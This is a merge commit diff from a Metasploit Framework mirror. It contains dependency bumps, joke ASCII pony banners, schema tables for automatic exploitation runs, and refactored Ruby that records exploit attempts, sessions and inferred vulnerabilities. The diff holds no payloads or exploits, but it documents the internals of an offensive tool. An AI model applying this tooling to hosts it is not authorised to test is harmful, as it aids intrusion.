infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge branch 'upstream/master' into stageless-x64 

Merge required adjustment of the proxy datastore names that were changed.
bug/bundler_fix
OJ 2015-04-03 08:53:09 +10:00
parent 633b46874d fde7cdd4a7
commit 5b5dc3ef59
30 changed files with 1370 additions and 584 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

18
Gemfile.lock
View File

@ -24,7 +24,7 @@ PATH
activerecord (>= 3.2.21, < 4.0.0)
metasploit-credential (~> 0.14.3)
metasploit-framework (= 4.11.0.pre.dev)
metasploit_data_models (~> 0.23.0)
metasploit_data_models (~> 0.23.2)
pg (>= 0.11)
metasploit-framework-pcap (4.11.0.pre.dev)
metasploit-framework (= 4.11.0.pre.dev)
@ -101,11 +101,11 @@ GEM
gherkin (2.11.6)
json (>= 1.7.6)
hike (1.2.3)
i18n (0.6.11)
i18n (0.7.0)
journey (1.0.4)
jsobfu (0.2.1)
rkelly-remix (= 0.0.6)
json (1.8.1)
json (1.8.2)
mail (2.5.4)
mime-types (~> 1.16)
treetop (~> 1.4.8)
@ -123,7 +123,7 @@ GEM
metasploit-model (0.29.0)
activesupport
railties (< 4.0.0)
metasploit_data_models (0.23.1)
metasploit_data_models (0.23.2)
activerecord (>= 3.2.13, < 4.0.0)
activesupport
arel-helpers
@ -135,11 +135,11 @@ GEM
meterpreter_bins (0.0.17)
method_source (0.8.2)
mime-types (1.25.1)
mini_portile (0.6.1)
mini_portile (0.6.2)
msgpack (0.5.11)
multi_json (1.0.4)
network_interface (0.0.1)
nokogiri (1.6.5)
nokogiri (1.6.6.2)
mini_portile (~> 0.6.0)
packetfu (1.1.9)
pcaprub (0.11.3)
@ -154,7 +154,7 @@ GEM
rack (>= 0.4)
rack-ssl (1.3.4)
rack
rack-test (0.6.2)
rack-test (0.6.3)
rack (>= 1.0)
rails (3.2.21)
actionmailer (= 3.2.21)
@ -175,7 +175,7 @@ GEM
rb-readline-r7 (0.5.2.0)
rdoc (3.12.2)
json (~> 1.4)
recog (1.0.16)
recog (1.0.24)
nokogiri
redcarpet (3.1.2)
rkelly-remix (0.0.6)
@ -219,7 +219,7 @@ GEM
treetop (1.4.15)
polyglot
polyglot (>= 0.3.1)
tzinfo (0.3.42)
tzinfo (0.3.43)
xpath (2.0.0)
nokogiri (~> 1.3)
yard (0.8.7.4)

35
data/logos/pony-01.aftxt Normal file
View File

@ -0,0 +1,35 @@
 _________________________________________________ 
< This console just got 20% cooler >
 ------------------------------------------------- 
/
/ 
▀▄▄▄▄▄▄▄▄ / 
▀▀▄▄▄▄▄█▄▄▄▄ / 
▄███▄▄▄▄██▄██ / 
▄██▄█▄▄█▄▄██▄███ / 
▄██▄█████▄██▄▄█▄▄ / 
▄███████▄██▄▀▀▄▄██ / 
██████████▄▄▄ ██▄█ / 
██▄███▄███ ▀▀ ████ / 
▀███▄███▄▀ ███ / 
▀ ████▄▀ █▄█ / 
██▄▀█ ▄▄▄▄▄▄▄▄ / 
▀▄█ ▀ ▄▄█▄██████▄▄ / 
▀█ ███▄█████████ / 
▄███▄▄█████████ / 
███████▄██████▄▀ / 
█████▄▄█████████ 
▄▄███▄▀ █▄███████ ▄▄▄▄▄▄▄▄▄ 
▄▄█████ ▄█▄██▄████▄█▄█▄▄██▄▄██▄█▀ 
▀▄██▄▀▄▄▄███▄▄███▄██▄▄███▄▄███▄▄▄ 
▀▀ ▄███████████████▄▄▄██▄▄███▀▄ 
████▄█████████▄▄▄▄▄█▄▄▄▄▄███ 
███████▄█████▄▄████▄▄██▄██▀▄██ 
▀▀▄▄██████▄██████▄▄▄████▄▄ ▀▀▀ 
▄▄██████████▄▄█▄▄▄▄▄██▄▄▄ 
██▄█████████▄▄▄██████████ 
▀▀ █▄████ ███▄█▄▄▄▄▄▄▄▀▀ 
▄▄████ ████▄██ 
▀▄████ ██▄███ 
▀▄▄▀ ██▀█▀▀ 
█ 

31
data/logos/pony-02.aftxt Normal file
View File

@ -0,0 +1,31 @@
 __________________ 
< Shells are cool. >
 ------------------ 
\ 
\ 
\ 
\ 
\ ▄▄▄▄▄▄▄▄▄ 
███████████ 
▄▄██████████ 
▄▄███████████▄▄ 
▄███████████▄▄▄█▄▄ 
▄▄██▄▄▄▄▄▄▄▄▄███▄▄█▄▄ 
▄▄████▄▄███████████████ 
████████▄▄▄▄█████████▄▀ 
███████▄███▄▄████████ 
▄▄▄███████▄█▄█████████▄▀ ▄▄▄▄▄▄ 
▀▄▄███████▄▄▄███████▄▀ ▄▄██████▄▄█▀ 
▀▄▄▄██████▄█████▄▀ ▄▄███████████▄ 
▀▀▀▀▀▀█▄███▄▄▄▄▄▄▄▄▄▄▄▄▄▀▀▀▄██████▄▄
███▄▄█▄██████████▄▄ █████▄▄█
▄███▄█████████▄█▄██ ▄▄████ ▀
▀▀▄██████████▄▄▄▄▀ ▀▀ ██▄▀ 
█████▄▄▄▄█▄███▄▄ █▄▀ 
██████ ▀▄▄██████ ▀ 
▄▄▄████ ████████ 
███████ █████████ 
▄█▄▄█████ █████████ 
█▄███████ █▄▄███████ 
█▄▄▄▄▄█ █▄▄▄▄▄█ 


27
data/logos/pony-03.aftxt Normal file
View File

@ -0,0 +1,27 @@
 ______________________________ 
< I love SHELLS! >
 ------------------------------ 
\ 
\ 
\ 
▄▄██▄█▄▄▄▄ 
▄▄█████▄▄▄▄█▄▄ 
▄▄▄██████████▄▄▄▀ 
██▄▄█▄▄▄▄█▄▄█▄█ 
██▄▄▄████▄▄▄████ 
▄▄████▄▄▄██▄█▄▄▀ 
▄▄▄▄▄▄▄▄▄▄ ██▄█▄▄██▄▄▄▄▄██▄▄█
▄▄▄▄▄▄▄▄▄▄▄▄▄▄ █▄▄▄██▄█████▄▄▄▀▀ 
▄▄████▄▄▄▄▄▄▄▄▄▄ ██▄▄▄▄███████▄▄▄ 
█████▄▄▄▄▄▀▀▄▄▄▄▄▄██▄▄▄█▄███▄█▀▀▀ 
████▄█▄█ █▄██▄▄█▄▄▄██▄███ 
▀▄▄▄▄█▄▄▄ ██▄█▄██▄▄▄▄▄█▄███ 
▀▄██▄▄██▄█ ██▄█▄██▄█▄▄█████ 
█▄█▄███▄▄█ ████▄▄█▄▄▄██▄█ 
▄██ ███▄██▄███ ▄▄▄█▄▄▄█▀▀██████ 
▀▄▄█▄█▄▄█▄██▀▀▀ ▄▄██▄▄██ ██████ 
▀▄▄▀██▄▄▀▀▀ ▄▄█████▄▀ ▄▄█████ 
▀▀▀ ▄▄███████ ███████ 
▄▄███▄▄██ ▄▄███████ 
██████▀▀▀ ▀▄████▀▀▀ 
▀▀▀▀▀▀ ▀▀▀ 

29
data/logos/pony-04.aftxt Normal file
View File

@ -0,0 +1,29 @@
 ____________________________________ 
< My Little Pwny: Exploits are Magic >
 ------------------------------------ 
\ 
\ 
\ 
▄▄▄▄▄▄▄▄▄▄ 
▄▄█████████▄▄▄▄▄▄▄ 
█▄▄▄████████▄▄▄▄████
█▄▄▄██▄█████▄████████
▄▄▄██████▄▄▄▄▄▄▄▄▄██▄▀ 
████▄████▄▄▄▄▄▄██▄▄█▄▄ 
██████████████████████ 
▀▄███▄███▄██▄▄▄████▀▀ 
▄▄▄▄▄▄▄▄▄ ▀▄██▄▄██▄▄█▄▄▄▄███▄ 
▄▄█████████▄▄ ▀█▄█████▄█▄▄▄█▄███ 
███████▄▀▀▀▄█▄▄ ▄▄█▄▄█▄▄█▄▄▄▄▄▄▀▀ 
████████ ▀▄▄▄▄▄███▄██▄▄▄██ 
████████ ▄▄ ▄▄█████▄▄▄▄██████ 
████████▄▄██ ███████████████▄▀ 
▀▄██████▄▄▄▀ ▀▄████████████▄▀ 
▄▄████▄▄██ ▄███▄█▄▄▄▄██▄██ 
█████████▄▀ █████▄▄▀ ██████ 
███▄███▀▀ ███████ ███▄▄▄▄ 
▀▄▄▄▀ ████████ ███████ 
████████ ████▄▄██▄ 
██████▄▄█ ██████▄▄█ 
█▄▄▄▄█ █▄▄▄▄█ 


24
data/logos/pony-05.aftxt Normal file
View File

@ -0,0 +1,24 @@
 ______________________ 
< FREE SHELLS FOREVER!!! >
 ---------------------- 
\ 
\ ▄██▄▄▄ ▄▄▄ 
\ ███▄▄█▄▄▄▄▄▄▄▄▄ 
▄▄▄███▄▄██▄██████▄▄ 
▄▄▄▄█▄▄██▄▄▄▄▄▄▄▄█▄████ 
████▄▄██▄▄██▄▄▄█▄██▄████ ▄█▄▄▄▄ 
████ █▄██▄▄███▄▄▄█▄▄▄██ ▄▄▄▄▄▄█▄█▄▄▄█▄▄ 
███ ██████████▄██████ ██▄▄▄▄█▄▄▄██████ 
▀▄██ ▄█▄▄█▄████▄▄█▄▄▄█▄▄▄▄█▄▄█████▄▄████████ 
▀█ ███▄██████████▄▄███▄██▄▄██████▄▄███████ 
▄▀ ▀▀█▄▄▄▄▄███▄▄▄▄▄▄▄██▄███▄███▄▄██████▄▀ 
▀ ██▄▄██▄▄█▄▄▄▄▄▄▄ ▀▀▄▄█▄▄▄███▄▄ 
█████▄▄█▄▄███▄▄▄█ ████▄▄███▄▄
█▄▄█▄▄▄▄▄█▄██▄▄█ ███▄█▄▄▄█▄██
▄▄▄█▄█████▄████ ▀▄█████▄▄██▀
▄█▄▄▄▄███▀▄█▄████▄█ ▀▄█▄▄███ ▄
▄▄██▄██▄▄▄▀█▄███▄██▄▀ ▄▄█▄█▄▄█
█▄██████ ███▄▄███▄▀ ▀▄▄▄▄▀▀ 
██████ ▀▀███████ 
▀▀▀▀▀▀ ▀▀▀▀▀▀ 


88
db/schema.rb
View File

@ -11,7 +11,7 @@
#
# It's strongly recommended to check this file into your version control system.
ActiveRecord::Schema.define(:version => 20150212214222) do
ActiveRecord::Schema.define(:version => 20150326183742) do
create_table "api_keys", :force => true do |t|
t.text "token"
@ -19,6 +19,54 @@ ActiveRecord::Schema.define(:version => 20150212214222) do
t.datetime "updated_at", :null => false
end
create_table "automatic_exploitation_match_results", :force => true do |t|
t.integer "match_id"
t.integer "run_id"
t.string "state", :null => false
t.datetime "created_at", :null => false
t.datetime "updated_at", :null => false
end
add_index "automatic_exploitation_match_results", ["match_id"], :name => "index_automatic_exploitation_match_results_on_match_id"
add_index "automatic_exploitation_match_results", ["run_id"], :name => "index_automatic_exploitation_match_results_on_run_id"
create_table "automatic_exploitation_match_sets", :force => true do |t|
t.integer "workspace_id"
t.integer "user_id"
t.datetime "created_at", :null => false
t.datetime "updated_at", :null => false
end
add_index "automatic_exploitation_match_sets", ["user_id"], :name => "index_automatic_exploitation_match_sets_on_user_id"
add_index "automatic_exploitation_match_sets", ["workspace_id"], :name => "index_automatic_exploitation_match_sets_on_workspace_id"
create_table "automatic_exploitation_matches", :force => true do |t|
t.integer "module_detail_id"
t.string "state"
t.integer "nexpose_data_vulnerability_definition_id"
t.datetime "created_at", :null => false
t.datetime "updated_at", :null => false
t.integer "match_set_id"
t.string "matchable_type"
t.integer "matchable_id"
t.text "module_fullname"
end
add_index "automatic_exploitation_matches", ["module_detail_id"], :name => "index_automatic_exploitation_matches_on_ref_id"
add_index "automatic_exploitation_matches", ["module_fullname"], :name => "index_automatic_exploitation_matches_on_module_fullname"
create_table "automatic_exploitation_runs", :force => true do |t|
t.integer "workspace_id"
t.integer "user_id"
t.integer "match_set_id"
t.datetime "created_at", :null => false
t.datetime "updated_at", :null => false
end
add_index "automatic_exploitation_runs", ["match_set_id"], :name => "index_automatic_exploitation_runs_on_match_set_id"
add_index "automatic_exploitation_runs", ["user_id"], :name => "index_automatic_exploitation_runs_on_user_id"
add_index "automatic_exploitation_runs", ["workspace_id"], :name => "index_automatic_exploitation_runs_on_workspace_id"
create_table "clients", :force => true do |t|
t.integer "host_id"
t.datetime "created_at"
@ -155,19 +203,22 @@ ActiveRecord::Schema.define(:version => 20150212214222) do
end
create_table "loots", :force => true do |t|
t.integer "workspace_id", :default => 1, :null => false
t.integer "workspace_id", :default => 1, :null => false
t.integer "host_id"
t.integer "service_id"
t.string "ltype", :limit => 512
t.string "path", :limit => 1024
t.string "ltype", :limit => 512
t.string "path", :limit => 1024
t.text "data"
t.datetime "created_at", :null => false
t.datetime "updated_at", :null => false
t.datetime "created_at", :null => false
t.datetime "updated_at", :null => false
t.string "content_type"
t.text "name"
t.text "info"
t.integer "module_run_id"
end
add_index "loots", ["module_run_id"], :name => "index_loots_on_module_run_id"
create_table "macros", :force => true do |t|
t.datetime "created_at", :null => false
t.datetime "updated_at", :null => false
@ -359,6 +410,26 @@ ActiveRecord::Schema.define(:version => 20150212214222) do
add_index "module_refs", ["detail_id"], :name => "index_module_refs_on_module_detail_id"
add_index "module_refs", ["name"], :name => "index_module_refs_on_name"
create_table "module_runs", :force => true do |t|
t.datetime "attempted_at"
t.text "fail_detail"
t.string "fail_reason"
t.text "module_fullname"
t.integer "port"
t.string "proto"
t.integer "session_id"
t.string "status"
t.integer "trackable_id"
t.string "trackable_type"
t.integer "user_id"
t.string "username"
t.datetime "created_at", :null => false
t.datetime "updated_at", :null => false
end
add_index "module_runs", ["session_id"], :name => "index_module_runs_on_session_id"
add_index "module_runs", ["user_id"], :name => "index_module_runs_on_user_id"
create_table "module_targets", :force => true do |t|
t.integer "detail_id"
t.integer "index"
@ -481,13 +552,16 @@ ActiveRecord::Schema.define(:version => 20150212214222) do
t.integer "port"
t.string "platform"
t.text "datastore"
t.datetime "opened_at", :null => false
t.datetime "opened_at", :null => false
t.datetime "closed_at"
t.string "close_reason"
t.integer "local_id"
t.datetime "last_seen"
t.integer "module_run_id"
end
add_index "sessions", ["module_run_id"], :name => "index_sessions_on_module_run_id"
create_table "tags", :force => true do |t|
t.integer "user_id"
t.string "name", :limit => 1024

9
lib/metasploit/framework/login_scanner/chef_webui.rb
View File

@ -24,7 +24,14 @@ module Metasploit
# @param credential [Metasploit::Framework::Credential] The credential object
# @return [Result]
def attempt_login(credential)
result_opts = { credential: credential }
result_opts = {
credential: credential,
status: Metasploit::Model::Login::Status::INCORRECT,
proof: nil,
host: host,
port: port,
protocol: 'tcp'
}
begin
status = try_login(credential)

9
lib/metasploit/framework/login_scanner/symantec_web_gateway.rb
View File

@ -95,7 +95,14 @@ module Metasploit
# @param credential [Metasploit::Framework::Credential] The credential object
# @return [Result] A Result object indicating success or failure
def attempt_login(credential)
result_opts = { credential: credential }
result_opts = {
credential: credential,
status: Metasploit::Model::Login::Status::INCORRECT,
proof: nil,
host: host,
port: port,
protocol: 'tcp'
}
begin
result_opts.merge!(get_login_state(credential.public, credential.private))

12
lib/msf/base/sessions/meterpreter.rb
View File

@ -323,9 +323,9 @@ class Meterpreter < Rex::Post::Meterpreter::Client
nhost = find_internet_connected_address
original_session_host = self.session_host
# If we found a better IP address for this session, change it up
# only handle cases where the DB is not connected here
if !(framework.db && framework.db.active)
# If we found a better IP address for this session, change it
# up. Only handle cases where the DB is not connected here
if nhost && !(framework.db && framework.db.active)
self.session_host = nhost
end
@ -461,6 +461,8 @@ protected
# @see Rex::Post::Meterpreter::Extensions::Stdapi::Net::Config#get_routes
# @return [String] The address from which this host reaches the
# internet, as ASCII. e.g.: "192.168.100.156"
# @return [nil] If there is an interface with an address that matches
# {#session_host}
def find_internet_connected_address
ifaces = self.net.config.get_interfaces().flatten rescue []
@ -497,7 +499,9 @@ protected
end
if !nhost
# Find the first non-loopback address
# No internal address matches what we see externally and no
# interface has a default route. Fall back to the first
# non-loopback address
non_loopback = ifaces.find { |i| i.ip != "127.0.0.1" && i.ip != "::1" }
if non_loopback
nhost = non_loopback.ip

4
lib/msf/core/db_manager.rb
View File

@ -23,6 +23,10 @@ require 'msf/core/service_state'
class Msf::DBManager
extend Metasploit::Framework::Require
# Default proto for making new `Mdm::Service`s. This should probably be a
# const on `Mdm::Service`
DEFAULT_SERVICE_PROTO = "tcp"
autoload :Adapter, 'msf/core/db_manager/adapter'
autoload :Client, 'msf/core/db_manager/client'
autoload :Connection, 'msf/core/db_manager/connection'

260
lib/msf/core/db_manager/exploit_attempt.rb
View File

@ -27,186 +27,152 @@ module Msf::DBManager::ExploitAttempt
}
end
# Create an `Mdm::ExploitAttempt` (and possibly an `Mdm::VulnAttempt`, if
# the `vuln` option is passed).
#
# @option (see #do_report_failure_or_success)
# @return (see #do_report_failure_or_success)
def report_exploit_failure(opts)
return unless opts.has_key?(:refs) && !opts[:refs].blank?
host = opts[:host] || return
::ActiveRecord::Base.connection_pool.with_connection {
wspace = opts.delete(:workspace) || workspace
mrefs = opts.delete(:refs) || return
host = opts.delete(:host)
port = opts.delete(:port)
prot = opts.delete(:proto)
svc = opts.delete(:service)
vuln = opts.delete(:vuln)
timestamp = opts.delete(:timestamp)
freason = opts.delete(:fail_reason)
fdetail = opts.delete(:fail_detail)
username = opts.delete(:username)
mname = opts.delete(:module)
# Look up the host as appropriate
if not (host and host.kind_of? ::Mdm::Host)
if svc.kind_of? ::Mdm::Service
host = svc.host
else
host = get_host( :workspace => wspace, :address => host )
end
end
# Bail if we dont have a host object
return if not host
wspace = opts[:workspace] || workspace
port = opts[:port]
prot = opts[:proto] || Msf::DBManager::DEFAULT_SERVICE_PROTO
svc = opts[:service]
# Look up the service as appropriate
if port and svc.nil?
prot ||= "tcp"
svc = get_service(wspace, host, prot, port) if port
svc = get_service(wspace, host, prot, port)
end
if not vuln
# Create a references map from the module list
ref_objs = ::Mdm::Ref.where(:name => mrefs.map { |ref|
if ref.respond_to?(:ctx_id) and ref.respond_to?(:ctx_val)
"#{ref.ctx_id}-#{ref.ctx_val}"
else
ref.to_s
end
})
# Try find a matching vulnerability
vuln = find_vuln_by_refs(ref_objs, host, svc)
end
# Report a vuln_attempt if we found a match
if vuln
attempt_info = {
:attempted_at => timestamp || Time.now.utc,
:exploited => false,
:fail_reason => freason,
:fail_detail => fdetail,
:username => username || "unknown",
:module => mname
}
vuln.vuln_attempts.create(attempt_info)
end
# Report an exploit attempt all the same
attempt_info = {
:attempted_at => timestamp || Time.now.utc,
:exploited => false,
:username => username || "unknown",
:module => mname,
:fail_reason => freason,
:fail_detail => fdetail
}
attempt_info[:vuln_id] = vuln.id if vuln
if svc
attempt_info[:port] = svc.port
attempt_info[:proto] = svc.proto
end
if port and svc.nil?
attempt_info[:port] = port
attempt_info[:proto] = prot || "tcp"
end
host.exploit_attempts.create(attempt_info)
}
end
def report_exploit_success(opts)
::ActiveRecord::Base.connection_pool.with_connection {
wspace = opts.delete(:workspace) || workspace
mrefs = opts.delete(:refs) || return
host = opts.delete(:host)
port = opts.delete(:port)
prot = opts.delete(:proto)
svc = opts.delete(:service)
vuln = opts.delete(:vuln)
timestamp = opts.delete(:timestamp)
username = opts.delete(:username)
mname = opts.delete(:module)
# Look up or generate the host as appropriate
if not (host and host.kind_of? ::Mdm::Host)
# Look up the host as appropriate
if !host || !host.kind_of?(::Mdm::Host)
if svc.kind_of? ::Mdm::Service
host = svc.host
else
host = report_host(:workspace => wspace, :address => host )
host = get_host(workspace: wspace, address: host)
end
end
# Bail if we dont have a host object
return if not host
opts = opts.dup
opts[:service] = svc
opts[:host] = host
do_report_failure_or_success(opts)
end
# Create an `Mdm::ExploitAttempt` (and possibly an `Mdm::VulnAttempt`, if
# the `vuln` option is passed).
#
# @return (see #do_report_failure_or_success)
def report_exploit_success(opts)
return unless opts[:refs]
host = opts[:host] || return
wspace = opts[:workspace] || workspace
port = opts[:port]
prot = opts[:proto] || Msf::DBManager::DEFAULT_SERVICE_PROTO
svc = opts[:service]
# Look up or generate the service as appropriate
if port and svc.nil?
svc = report_service(:workspace => wspace, :host => host, :port => port, :proto => prot ) if port
# it is rude to modify arguments in place
opts = opts.dup
opts[:proto] ||= Msf::DBManager::DEFAULT_SERVICE_PROTO
opts[:service] = report_service(
workspace: wspace, host: host, port: port, proto: prot
)
end
if not vuln
# Create a references map from the module list
ref_objs = ::Mdm::Ref.where(:name => mrefs.map { |ref|
if ref.respond_to?(:ctx_id) and ref.respond_to?(:ctx_val)
"#{ref.ctx_id}-#{ref.ctx_val}"
else
ref.to_s
end
})
do_report_failure_or_success(opts)
end
# Try find a matching vulnerability
vuln = find_vuln_by_refs(ref_objs, host, svc)
end
private
# @option opts [Array<String>, Array<Msf::Module::Reference>] :refs
# @option opts [Mdm::Host] :host
# @option opts [Mdm::Service] :service
# @option opts [Integer] :port (nil)
# @option opts ["tcp","udp"] :proto (Msf::DBManager::DEFAULT_SERVICE_PROTO) See `Mdm::Service::PROTOS`
# @option opts [Mdm::Vuln] :vuln (nil)
# @option opts [Time] :timestamp (nil)
# @option opts [Mdm::Vuln] :timestamp (nil)
# @option opts [String] :module (nil)
# @return [void]
def do_report_failure_or_success(opts)
return unless opts[:refs]
::ActiveRecord::Base.connection_pool.with_connection {
mrefs = opts[:refs]
host = opts[:host]
port = opts[:port]
prot = opts[:proto]
svc = opts[:service]
vuln = opts[:vuln]
timestamp = opts[:timestamp]
freason = opts[:fail_reason]
fdetail = opts[:fail_detail]
username = opts[:username]
mname = opts[:module]
if vuln.nil?
ref_names = mrefs.map { |ref|
if ref.respond_to?(:ctx_id) and ref.respond_to?(:ctx_val)
"#{ref.ctx_id}-#{ref.ctx_val}"
else
ref.to_s
end
}
# Create a references map from the module list
ref_objs = ::Mdm::Ref.where(name: ref_names)
# Try find a matching vulnerability
vuln = find_vuln_by_refs(ref_objs, host, svc)
end
# We have match, lets create a vuln_attempt record
if vuln
attempt_info = {
:vuln_id => vuln.id,
:attempted_at => timestamp || Time.now.utc,
:exploited => true,
:exploited => (freason.nil? ? true : false),
:fail_detail => fdetail,
:fail_reason => freason,
:module => mname,
:username => username || "unknown",
:module => mname
}
attempt_info[:session_id] = opts[:session_id] if opts[:session_id]
attempt_info[:loot_id] = opts[:loot_id] if opts[:loot_id]
vuln.vuln_attempts.create(attempt_info)
# We have match, lets create a vuln_attempt record
if vuln
attempt_info[:vuln_id] = vuln.id
vuln.vuln_attempts.create(attempt_info)
# Correct the vuln's associated service if necessary
if svc and vuln.service_id.nil?
vuln.service = svc
vuln.save
# Correct the vuln's associated service if necessary
if svc and vuln.service_id.nil?
vuln.service = svc
vuln.save
end
end
end
# Report an exploit attempt all the same
attempt_info = {
:attempted_at => timestamp || Time.now.utc,
:exploited => true,
:username => username || "unknown",
:module => mname
# Report an exploit attempt all the same
if svc
attempt_info[:port] = svc.port
attempt_info[:proto] = svc.proto
end
if port and svc.nil?
attempt_info[:port] = port
attempt_info[:proto] = prot || Msf::DBManager::DEFAULT_SERVICE_PROTO
end
host.exploit_attempts.create(attempt_info)
}
attempt_info[:vuln_id] = vuln.id if vuln
attempt_info[:session_id] = opts[:session_id] if opts[:session_id]
attempt_info[:loot_id] = opts[:loot_id] if opts[:loot_id]
if svc
attempt_info[:port] = svc.port
attempt_info[:proto] = svc.proto
end
if port and svc.nil?
attempt_info[:port] = port
attempt_info[:proto] = prot || "tcp"
end
host.exploit_attempts.create(attempt_info)
}
end
end
end

5
lib/msf/core/db_manager/host.rb
View File

@ -96,8 +96,7 @@ module Msf::DBManager::Host
norm_host = host.host
elsif host.respond_to?(:session_host)
# Then it's an Msf::Session object
thost = host.session_host
norm_host = thost
norm_host = host.session_host
end
# If we got here and don't have a norm_host yet, it could be a
@ -325,4 +324,4 @@ module Msf::DBManager::Host
host
}
end
end
end

4
lib/msf/core/db_manager/service.rb
View File

@ -85,7 +85,7 @@ module Msf::DBManager::Service
end
=end
proto = opts[:proto] || 'tcp'
proto = opts[:proto] || Msf::DBManager::DEFAULT_SERVICE_PROTO
service = host.services.where(port: opts[:port].to_i, proto: proto).first_or_initialize
opts.each { |k,v|
@ -126,4 +126,4 @@ module Msf::DBManager::Service
wspace.services.includes(:host).where(conditions).order("hosts.address, port")
}
end
end
end

228
lib/msf/core/db_manager/session.rb
View File

@ -74,101 +74,66 @@ module Msf::DBManager::Session
# @raise [ActiveRecord::RecordInvalid] if session is invalid and cannot be
# saved.
#
# @raise ArgumentError if :host and :session is +nil+
# @raise ArgumentError if :host and :session are both +nil+
def report_session(opts)
return if not active
::ActiveRecord::Base.connection_pool.with_connection {
if opts[:session]
raise ArgumentError.new("Invalid :session, expected Msf::Session") unless opts[:session].kind_of? Msf::Session
session = opts[:session]
wspace = opts[:workspace] || find_workspace(session.workspace)
h_opts = { }
h_opts[:host] = normalize_host(session)
h_opts[:arch] = session.arch if session.respond_to?(:arch) and session.arch
h_opts[:workspace] = wspace
host = find_or_create_host(h_opts)
sess_data = {
:host_id => host.id,
:stype => session.type,
:desc => session.info,
:platform => session.platform,
:via_payload => session.via_payload,
:via_exploit => session.via_exploit,
:routes => [],
:datastore => session.exploit_datastore.to_h,
:port => session.session_port,
:opened_at => Time.now.utc,
:last_seen => Time.now.utc,
:local_id => session.sid
}
s = create_mdm_session_from_session(opts)
session.db_record = s
elsif opts[:host]
raise ArgumentError.new("Invalid :host, expected Host object") unless opts[:host].kind_of? ::Mdm::Host
host = opts[:host]
sess_data = {
:host_id => host.id,
:stype => opts[:stype],
:desc => opts[:desc],
:platform => opts[:platform],
:via_payload => opts[:via_payload],
:via_exploit => opts[:via_exploit],
:routes => opts[:routes] || [],
:datastore => opts[:datastore],
:opened_at => opts[:opened_at],
:closed_at => opts[:closed_at],
:last_seen => opts[:last_seen] || opts[:closed_at],
:close_reason => opts[:close_reason],
}
s = create_mdm_session_from_host(opts)
else
raise ArgumentError.new("Missing option :session or :host")
end
ret = {}
# Truncate the session data if necessary
if sess_data[:desc]
sess_data[:desc] = sess_data[:desc][0,255]
end
wspace = s.workspace
# In the case of multi handler we cannot yet determine the true
# exploit responsible. But we can at least show the parent versus
# just the generic handler:
if session and session.via_exploit == "exploit/multi/handler" and sess_data[:datastore]['ParentModule']
sess_data[:via_exploit] = sess_data[:datastore]['ParentModule']
end
s = ::Mdm::Session.new(sess_data)
s.save!
if session and session.exploit_task and session.exploit_task.record
session_task = session.exploit_task.record
if session_task.class == Mdm::Task
Mdm::TaskSession.create(:task => session_task, :session => s )
if session
if session.exploit.user_data_is_match?
MetasploitDataModels::AutomaticExploitation::MatchResult.create!(
match: session.exploit.user_data[:match],
match_set: session.exploit.user_data[:match_set],
run: session.exploit.user_data[:run],
state: 'succeeded',
)
elsif session.via_exploit
# This is a live session, we know the host is vulnerable to something.
infer_vuln_from_session(session, wspace)
end
end
s
}
end
if opts[:session]
session.db_record = s
end
protected
# If this is a live session, we know the host is vulnerable to something.
if opts[:session] and session.via_exploit
mod = framework.modules.create(session.via_exploit)
# @param session [Msf::Session] A session with a {db_record Msf::Session#db_record}
# @param wspace [Mdm::Workspace]
# @return [void]
def infer_vuln_from_session(session, wspace)
::ActiveRecord::Base.connection_pool.with_connection {
s = session.db_record
host = s.host
if session.via_exploit == "exploit/multi/handler" and sess_data[:datastore]['ParentModule']
mod_fullname = sess_data[:datastore]['ParentModule']
mod_name = ::Mdm::Module::Detail.find_by_fullname(mod_fullname).name
if session.via_exploit == "exploit/multi/handler" and session.exploit_datastore['ParentModule']
mod_fullname = session.exploit_datastore['ParentModule']
else
mod_name = mod.name
mod_fullname = mod.fullname
mod_fullname = session.via_exploit
end
mod_detail = ::Mdm::Module::Detail.find_by_fullname(mod_fullname)
mod_name = mod_detail.name
vuln_info = {
:host => host.address,
:name => mod_name,
:refs => mod.references,
:workspace => wspace,
:exploited_at => Time.now.utc,
:info => "Exploited by #{mod_fullname} to create Session #{s.id}"
exploited_at: Time.now.utc,
host: host,
info: "Exploited by #{mod_fullname} to create Session #{s.id}",
name: mod_name,
refs: mod_detail.refs.map(&:name),
workspace: wspace,
}
port = session.exploit_datastore["RPORT"]
@ -178,28 +143,105 @@ module Msf::DBManager::Session
vuln = framework.db.report_vuln(vuln_info)
if session.via_exploit == "exploit/multi/handler" and sess_data[:datastore]['ParentModule']
via_exploit = sess_data[:datastore]['ParentModule']
else
via_exploit = session.via_exploit
end
attempt_info = {
:timestamp => Time.now.utc,
:workspace => wspace,
:module => via_exploit,
:username => session.username,
:refs => mod.references,
:session_id => s.id,
:host => host,
:service => service,
:vuln => vuln
host: host,
module: mod_fullname,
refs: mod_detail.refs,
service: service,
session_id: s.id,
timestamp: Time.now.utc,
username: session.username,
vuln: vuln,
workspace: wspace,
}
framework.db.report_exploit_success(attempt_info)
end
s
}
vuln
}
end
end
def create_mdm_session_from_session(opts)
::ActiveRecord::Base.connection_pool.with_connection {
session = opts[:session]
raise ArgumentError.new("Invalid :session, expected Msf::Session") unless session.kind_of? Msf::Session
wspace = opts[:workspace] || find_workspace(session.workspace)
h_opts = { }
h_opts[:host] = normalize_host(session)
h_opts[:arch] = session.arch if session.respond_to?(:arch) and session.arch
h_opts[:workspace] = wspace
host = find_or_create_host(h_opts)
sess_data = {
datastore: session.exploit_datastore.to_h,
desc: truncate_session_desc(session.info),
host_id: host.id,
last_seen: Time.now.utc,
local_id: session.sid,
opened_at: Time.now.utc,
platform: session.platform,
port: session.session_port,
routes: [],
stype: session.type,
via_exploit: session.via_exploit,
via_payload: session.via_payload,
}
# In the case of multi handler we cannot yet determine the true
# exploit responsible. But we can at least show the parent versus
# just the generic handler:
if session.via_exploit == "exploit/multi/handler" and sess_data[:datastore]['ParentModule']
sess_data[:via_exploit] = sess_data[:datastore]['ParentModule']
end
s = ::Mdm::Session.create!(sess_data)
if session.exploit_task and session.exploit_task.record
session_task = session.exploit_task.record
if session_task.class == Mdm::Task
Mdm::TaskSession.create(task: session_task, session: s )
end
end
s
}
end
def create_mdm_session_from_host(opts)
::ActiveRecord::Base.connection_pool.with_connection {
host = opts[:host]
raise ArgumentError.new("Invalid :host, expected Host object") unless host.kind_of? ::Mdm::Host
sess_data = {
host_id: host.id,
stype: opts[:stype],
